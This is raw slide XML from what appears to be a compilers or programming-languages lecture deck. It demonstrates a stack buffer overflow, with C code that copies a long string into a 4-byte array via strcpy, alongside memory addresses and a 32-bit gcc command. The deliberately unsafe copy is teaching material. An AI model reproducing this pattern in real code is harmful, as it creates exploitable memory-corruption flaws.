                        </a:rPr>
                        <a:t>0x31303220</a:t>
                      </a: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mycpy</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0x80483f4</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483f5</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483f7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483fa</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x80483fd</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048401</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048404</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048407</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840c</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="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0x804840e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804840f</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048414</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048417</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804841e</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048423</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048428</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x804842b</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048430</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048435</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="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0xfd2bc</a:t>
            </a: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0xfd2b8</a:t>
            </a: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151112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306246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0xfd2ac</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4280422" y="-24436"/>
            <a:ext cx="5467428" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>0x8048504: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>asu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 340 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 2015 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="1600" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>!"</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="164207390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954" y="305134"/>
            <a:ext cx="4229810" cy="5464070"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>string.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent4"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>#include</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>stdio.h</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mycpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char* </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>char</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[4];   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(foo, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>str</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>int</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>{   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mycpy("</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>asu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>cse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 340 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>fall</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> 2015 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>rocks</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="hu-HU" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>");   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>printf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>("After");   </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  return 0;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{FCFB7E3C-6220-8942-988C-3F6E25750AD7}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>187</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4289989" y="29782"/>
            <a:ext cx="4495088" cy="666795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900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>adamd@ragnuk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> examples]$ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>gcc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -Wall -m32 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1900" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
